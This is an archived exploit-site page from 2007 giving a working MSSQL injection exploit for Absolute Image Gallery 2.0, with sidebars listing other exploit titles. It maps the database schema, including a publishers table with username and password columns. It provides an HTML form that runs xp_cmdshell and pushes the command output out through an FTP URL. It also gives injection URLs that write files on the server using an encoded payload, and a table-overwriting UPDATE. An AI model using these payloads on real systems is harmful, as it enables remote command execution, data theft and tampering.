exploits , vulnerabilities , articles , Absolute Image Gallery 2.0 (gallery.php categoryid) SQL Injection Vuln

2007-06-03 Particle Gallery <= 1.0.1 Remote SQL Injection Exploit
2007-04-18 jGallery 1.3 (index.php) Remote File Inclusion Vulnerability
2007-04-16 StoreFront for Gallery (GALLERY_BASEDIR) RFI Vulnerabilities
2007-04-16 Gallery 1.2.5 (GALLERY_BASEDIR) Multiple RFI Vulnerabilities
2007-04-15 Pixaria Gallery 1.x (class.Smarty.php) Remote File Include Vulnerability
2007-04-12 Mambo Component zOOm Media Gallery <= 2.5 Beta 2 RFI Vulnerabilities

2007-03-15

Absolute Image Gallery 2.0 (gallery.php categoryid) SQL Injection Vuln

Rated as : Moderate Risk

Absolute Image Gallery Gallery.ASP (categoryid) MSSQL Injection Exploit

Type :

SQL Injection

Release Date :

{2007-03-15}

Product / Vendor :

Absolute Image Gallery

http://www.xigla.com/absoluteig/

Bug :

http://localhost/script/gallery.asp?action=viewimage&categoryid=-SQL Inj-

---------------------------------------------------------------------------------------------------------------------------------------------

Script Table/Colon Name : 

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : articlefiles

fileid
filetitle
filename
articleid
filetype
filecomment
urlfile

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : articles

articleid
posted
lastupdate
headline
headlinedate
startdate
enddate
source
summary
articleurl
article
status
autoformat
publisherid
clicks
editor
relatedid

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : iArticlesZones

articleid
zoneid

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : plugins

pluginid
pplname
pplfile
ppldescription

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : PPL1reviews

reviewid
articleid
name
reviewdate
review
comments
isannonymous

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : publishers

publisherid
name
username
password
email
additional
plevel

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : publisherszones

publisherid
zoneid

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : xlaAIGcategories

categoryid
catname
catdesc
supercatid
lastupdate
catpath
images
allowupload

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : xlaAIGimages

imageid
imagename
imagedesc
imagefile
imagedate
imagesize
totalrating
totalreviews
hits
categoryid
status
uploadedby
additionalinfo
embedhtml
keywords
copyright
credit
source
datecreated
email
infourl

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : xlaAIGpostcards

dateposted
postcardid
imageid
bgcolor
bordercolor
fonttype
fontcolor
recipientname
recipientemail
greeting
bgsound
sendername
senderemail
sendermsg

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : zones

zonename
description
template
articlespz
zonefont
fontsize
fontcolor
showsource
showsummary
showdates
showtn
textalign
displayhoriz
cellcolor
targetframe

---------------------------------------------------------------------------------------------------------------------------------------------

MSSQL CMD Injection Exploit(For DBO Users) :

<title>Absolute Image Gallery MSSQL CMD Injection
Exploit</title>
<body bgcolor="#000000">
<form name="Form" method="get"
action="http://localhost/script/gallery.asp">
<center><font face="Verdana" size="2"
color="#FF0000"><b>Absolute Image Gallery MSSQL CMD
Injection
Exploit</b></font><br><br></center>
<center><font face="Verdana" size="1"
color="#00FF00"><b>Note : For DBO
Users</b></font><br><br></center>
<center><font face="Verdana" size="1"
color="#00FF00"><b>Example
:</b></font><br><br></center>
  <tr>
    <center><img
src="http://img382.imageshack.us/img382/7867/dirav8.jpg"></center><br>
    <center><td align="right"><font
face="Arial" size="1"
color="#00FF00">Command Exec :</td>
    <td> </td>
    <td><input name="action=viewimage&categoryid=-1"
type="text" value=";exec master..xp_cmdshell 'dir c:\ >
cmd.txt';CREATE TABLE cmd (txt varchar(8000));BULK INSERT cmd FROM
'cmd.txt';exec+sp_makewebtask+'ftp://127.0.0.1/public/file.txt','select+*+from+cmd';--"
class="inputbox" style="color: #000000"
style="width:300px; "></td>
  </tr>
  <tr>
    <td align="right"><font face="Arial"
size="1" color="#00FF00">Search Board</td>
    <td> </td>
    <td>
      <select name="">
        <option value="0">(CMD)</option>
      </select> <br><br>
      <input type="submit"
value="Apply"></center>
    </td>
  </tr>
</table>
</form>
<center><font face="Verdana" size="2"
color="#FF0000"><b>UniquE-Key{UniquE-Cracker}</b></font>
<br>
<font face="Verdana" size="2"
color="#FF0000"><b>UniquE@UniquE-Key.ORG</b></font>
<br>
<font face="Verdana" size="2"
color="#FF0000"><b>http://UniquE-Key.ORG</b></font></center>

---------------------------------------------------------------------------------------------------------------------------------------------

Code Injection(For DBO Users) :

Add Table :
http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;Create+table+code+(txt+varchar(8000),id+int);--

ASCII Code Add Database :
http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;declare+@q+varchar(8000)+select+@q=0x696E7365727420696E746F2066736F373737287478742C6964292076616C7565732827272C3129+exec(@q);--

Code Injection :
http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;declare+@txt+varchar(8000);select+@txt+=+(select+top+1+txt+from+code+where+id+=+1);declare+@o+int,+@f+int,+@t+int,+@ret+int+exec+sp_oacreate+'scripting.filesystemobject',+@o+out+exec+sp_oamethod+@o,+'createtextfile',+@f+out,+'c:/host',+1+exec+@ret+=+sp_oamethod+@f,+'writeline',+NULL,+@txt;--

---------------------------------------------------------------------------------------------------------------------------------------------

UPDATE(ALL users) :

http://localhost/script/gallery.asp?action=viewimage&categoryid=-1 UPDATE
table SET colon = 'x';--

---------------------------------------------------------------------------------------------------------------------------------------------

Tested :

Absolute Image Gallery 2.0

Vulnerable :

Absolute Image Gallery 2.0

Author :

UniquE-Key{UniquE-Cracker}
UniquE(at)UniquE-Key.Org
http://www.UniquE-Key.Org

securitydot.net - 2007-03-15

Exploits - newest 10 RSS | More

2007-06-15 56671 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33795 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41914 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28999 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19502 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16484 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19149 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16347 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33274 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17008 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit